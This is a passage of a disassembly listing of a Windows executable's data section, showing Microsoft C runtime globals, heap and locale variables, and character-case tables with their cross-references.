dword_408AC8 dd 77E78B61h ; DATA XREF: __getptd+10�r __mtinit+45�w ...
dword_408ACC dd 77E79B39h ; DATA XREF: __getptd+37�r __mtinit+52�w ...
dword_408AD0 dd 77E72B29h ; DATA XREF: __mtterm+B�r __mtinit+60�w ...
align 8
dword_408AD8 dd 77FC56E0h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: __mtinitlocks+4�o
; .data:off_4081F0�o
dword_408AF0 dd 77FC5700h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:004081F8�o
dword_408B08 dd 77FC5720h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:00408208�o
dd 77FC5740h, 0FFFFFFFFh, 4 dup(0)
dword_408B38 dd 77FC5760h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:00408220�o
dd 77FC5780h, 0FFFFFFFFh, 4 dup(0)
dd 77FC57A0h, 0
dd 1, 0DCh, 2 dup(0)
dword_408B80 dd 77FC57C0h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:00408240�o
dword_408B98 dd 77FC57E0h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:00408250�o
dd 77FC5800h, 0FFFFFFFFh, 4 dup(0)
dd 77FC5820h, 0FFFFFFFFh, 4 dup(0)
dword_408BE0 dd 77FC5840h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:00408270�o
dd 77FC5860h, 0FFFFFFFFh, 4 dup(0)
dd 77FC5880h, 0FFFFFFFFh, 4 dup(0)
dword_408C28 dd 0 ; DATA XREF: ___crtMessageBoxA+9�r
; ___crtMessageBoxA+38�w ...
dword_408C2C dd 0 ; DATA XREF: ___crtMessageBoxA+4D�w
; ___crtMessageBoxA:loc_402748�r
dword_408C30 dd 0 ; DATA XREF: ___crtMessageBoxA+5B�w
; ___crtMessageBoxA+D6�r
dword_408C34 dd 0 ; DATA XREF: ___crtMessageBoxA+7B�w
; ___crtMessageBoxA:loc_402703�r
dword_408C38 dd 0 ; DATA XREF: ___crtMessageBoxA+6C�w
; ___crtMessageBoxA+9C�r
dword_408C3C dd 1 ; DATA XREF: __setmbcp_lk:loc_402E0C�r
; __setmbcp+1D�w ...
dword_408C40 dd 77E7C706h ; DATA XREF: ___crtInitCritSecAndSpinCount+C�r
; ___crtInitCritSecAndSpinCount+39�w ...
align 10h
dword_408C50 dd 0 ; DATA XREF: __ValidateEH3RN:loc_4043C9�r
; __ValidateEH3RN+13F�r ...
align 8
dword_408C58 dd 0 ; DATA XREF: __ValidateEH3RN:loc_4043DC�r
; __ValidateEH3RN+1C4�r ...
dd 0Fh dup(0)
dword_408C98 dd 0 ; DATA XREF: __ValidateEH3RN+12C�o
; __ValidateEH3RN+191�o ...
dword_408C9C dd 0 ; DATA XREF: ___security_error_handler+17�r
dd 2 dup(0)
dword_408CA8 dd 0 ; DATA XREF: ___crtLCMapStringA+265�r
; ___crtGetStringTypeA+14A�r
dd 3 dup(0)
dword_408CB8 dd 0 ; DATA XREF: __setmbcp+63�r
; ___crtLCMapStringA+9D�r ...
align 10h
dword_408CC0 dd 1 ; DATA XREF: ___crtLCMapStringA+E�r
; ___crtLCMapStringA+31�w ...
dword_408CC4 dd 1 ; DATA XREF: ___crtGetStringTypeA+E�r
; ___crtGetStringTypeA+2E�w ...
dword_408CC8 dd 0 ; DATA XREF: __callnewh�r
dword_408CCC dd 0 ; DATA XREF: _malloc�r _calloc+8E�r ...
dword_408CD0 dd 0 ; DATA XREF: .data:off_4087F0�o
; .data:off_4087F4�o ...
dword_408CD4 dd 0 ; DATA XREF: ___freetlocinfo+A2�r
dword_408CD8 dd 0 ; DATA XREF: ___freetlocinfo+B�r
dd 46h dup(0)
dword_408DF4 dd 0 ; DATA XREF: ___freetlocinfo+79�r
dword_408DF8 dd 0 ; DATA XREF: ___freetlocinfo+29�r
dword_408DFC dd 0 ; DATA XREF: ___freetlocinfo+4C�r
; void *dword_408E00
dword_408E00 dd 0 ; DATA XREF: ___sbh_heap_init+21�w
; ___sbh_free_block+21C�r ...
dword_408E04 dd 0 ; DATA XREF: ___sbh_heap_init+28�w
; ___sbh_find_block�r ...
dword_408E08 dd 0 ; DATA XREF: ___sbh_heap_init+15�w
; ___sbh_find_block+8�r ...
dword_408E0C dd 0 ; DATA XREF: __heap_alloc+18�r
; _calloc+3A�r ...
dword_408E10 dd 0 ; DATA XREF: ___sbh_heap_init+2F�w
; ___sbh_free_block+300�w ...
dword_408E14 dd 0 ; DATA XREF: ___sbh_heap_init+3C�w
; ___sbh_alloc_new_region+5�r ...
dword_408E18 dd 0 ; DATA XREF: ___sbh_free_block+229�r
; ___sbh_free_block+249�r ...
; int dword_408E1C
dword_408E1C dd 0 ; DATA XREF: _setSBCS+1A�w
; _setSBUpLow+84�r ...
; void *dword_408E20
dword_408E20 dd 322778h ; DATA XREF: _freefls(x)+97�r
; __setmbcp+77�r ...
dword_408E24 dd 0 ; DATA XREF: _setSBCS+15�w
; __setmbcp_lk+F2�w ...
dd 6 dup(0)
byte_408E40 db 0 ; DATA XREF: _setSBCS+6�o
; __setmbcp_lk+52�o ...
byte_408E41 db 0 ; DATA XREF: _parse_cmdline+47�r
; _parse_cmdline+11D�r ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
; int dword_408F44
dword_408F44 dd 4E4h ; DATA XREF: _setSBCS+10�w
; _setSBUpLow+16�r ...
align 10h
word_408F50 dw 0 ; DATA XREF: _setSBCS+1F�o
; __setmbcp_lk+109�o ...
align 10h
byte_408F60 db 0 ; DATA XREF: _setSBUpLow:loc_402C28�w
; _setSBUpLow:loc_402C45�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
dword_409060 dd 320000h ; DATA XREF: __heap_init+19�w
; __heap_init+3E�r ...
dword_409064 dd 1 ; DATA XREF: __heap_init+28�w _free+13�r ...
dword_409068 dd 20h ; DATA XREF: __ioinit+21�w
; __ioinit:loc_401D3F�r ...
dd 5 dup(0)
dword_409080 dd 321F28h ; DATA XREF: __ioinit:loc_401CC9�w
; __ioinit+42�r ...
dword_409084 dd 3Fh dup(0) ; DATA XREF: __ioinit+9A�o
dword_409180 dd 1 ; DATA XREF: __setenvp+9F�w
dword_409184 dd 322EF4h ; DATA XREF: _doexit:loc_401491�r
; _doexit+57�w ...
; void *dword_409188
dword_409188 dd 322EF8h ; DATA XREF: _doexit+47�r _doexit+5C�r ...
dword_40918C dd 1 ; DATA XREF: __wincmdln+4�r
; __setenvp+3�r ...
dword_409190 dd 0 ; DATA XREF: __cinit�r
dword_409194 dd 142340h ; DATA XREF: start+10B�w
; __wincmdln:loc_40186A�r ...
_data ends
; Section 4. (virtual address 0000A000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00009200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 40A000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start